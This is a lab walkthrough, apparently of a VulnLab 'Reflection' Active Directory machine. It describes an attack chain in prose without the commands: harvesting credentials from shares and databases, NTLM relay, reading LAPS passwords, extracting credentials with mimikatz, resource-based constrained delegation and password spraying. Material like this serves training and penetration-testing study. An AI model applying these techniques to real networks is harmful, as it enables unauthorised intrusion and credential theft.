🪞Reflection

You will learn about relaying attacks and different flavours of exploiting a commonly Misconfigured ACL

Enumeration

IPs

10.10.241.21 dc01.reflection.vl
10.10.241.22 ms01.reflection.vl
10.10.241.23 ws01.reflection.vl

Enumerating SMB shares we find a custom one on MS01

Inside we find a configuration file

We find credentials probably for a user web_staging

The credentials work for MS01

Unfortunately we cannot enable xp_cmdshell

We enumerate the dbs

We find a users table

Inside there are credentials

SMB Relay

We can try to capture a NTLMv2 hash from the MSSQL machine

We cannot pth but we can relay it to other machines in the domain that have SMB signing not required

It's possbile to check it by looking at the Nmap script scan of the SMB server, or by using CME

First we need to disable the SMB and HTTP listeners on Responder configuration /etc/responder/Responder.conf

Then we run ntlmrelayx to authenticate to the DC

With -i it spawns an SMB shell on port 11000

Now we see a new share called prod

Inside there is another configuration file with creds for a web_prod user

With these creds we can login in MSSQL on the DC

We still cannot enable xp_cmdshell

Enumerating manually we can see a proddb with a users table

And we get new credentials

I wanted to create a user list to spray passwords later

We can do that with CME

Remove Guestand krbtgtand the list is complete

Bloodhound abbie.smith

With these credentials we can run bloodhound

Clicking on Shortest path from owned principals we can see that Abbie has Generic All to MS01

This is the attack path that bloodhound suggests

This won't work because the MachineAccountQuotafor this user is 0

Shadow Credentials was also advised from Bloodhound but it won't work because ADCS is not installed on the DC

With Generic All we can also read LAPS passwords, if enabled on the target

We got the password for the MS01 Administrator account and we can dump the SAM

Georgia.Price

After logging in with RDP i got a notification saying this

So i looked at the scheduled tasks and found a task called backup that starts powershell and does an ls

The interesting thing is that the task is ran by the user Georgia.Price

To get the user's password we can use mimikatz and use this command found in Hacktricks

Now running bloodhound with Georgia.Price

This user has Generic All to WS01

The machine account quota is still 0 but this time we have a machine account MS01 that we dumped before

So we don't need to add a new account to abuse Resource-Based Constrained Delegation

RBCD

First we check to see if delegation is enabled and if not we activate it for the machine account MS01$

Now we request a service ticket to impersonate the Administrator user

Now we dump the SAM of WS01 to find a plaintext password for Rhys.Garner

To get the flag WinRM is not enabled because it's a workstation but psexec.py cannot also be used if Defender is on

So try CME, it takes its sweet time, or atexec

Password spraying

I ran bloodhound again but nothing useful came up with this user

So i tried spraying the password

And it worked!

P.S.

xct Kali setup on top 🔥

PreviousDelegateNextIntercept

Last updated

Was this helpful?